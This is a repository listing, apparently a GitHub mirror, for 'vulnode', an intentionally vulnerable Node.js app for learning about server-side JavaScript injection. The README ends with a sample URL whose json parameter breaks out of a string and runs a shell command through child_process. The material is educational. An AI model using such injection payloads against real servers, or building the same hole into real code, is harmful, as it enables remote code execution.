https://github.com/dpnishant/vulnode

a vulnerable node.js application for education purpose
https://github.com/dpnishant/vulnode

Last synced: 10 months ago
JSON representation

a vulnerable node.js application for education purpose

• Host: GitHub
• URL: https://github.com/dpnishant/vulnode
• Owner: dpnishant
• License: mit
• Created: 2013-08-09T00:41:41.000Z (over 12 years ago)
• Default Branch: master
• Last Pushed: 2022-09-28T13:22:18.000Z (over 3 years ago)
• Last Synced: 2025-03-24T11:34:25.757Z (about 1 year ago)
• Language: JavaScript
• Size: 4.88 KB
• Stars: 1
• Watchers: 1
• Forks: 1
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

• awesome-mobile-CTF - Vulnode

README

          
vulnode

=======

Vulnode is a Node.js application vulnerable to server-side javascript injection. This is for education purposes only.





Save a profile: http://localhost:9091/?action=save&name=nishant&json={"name":"Nishant","age":"25","gender":"Male","location":"Bangalore","interests":"Piano"}






View a profile: http://localhost:9091/?action=view&name=nishant






Delete a profile: http://localhost:9091/?action=delete&name=nishant






Code Execution: http://localhost:9091/?json='test');var sys=require('sys');var exec=require('child_process').exec;function puts(error,stdout,stderr){sys.puts(stdout)};exec("ls -lah",puts);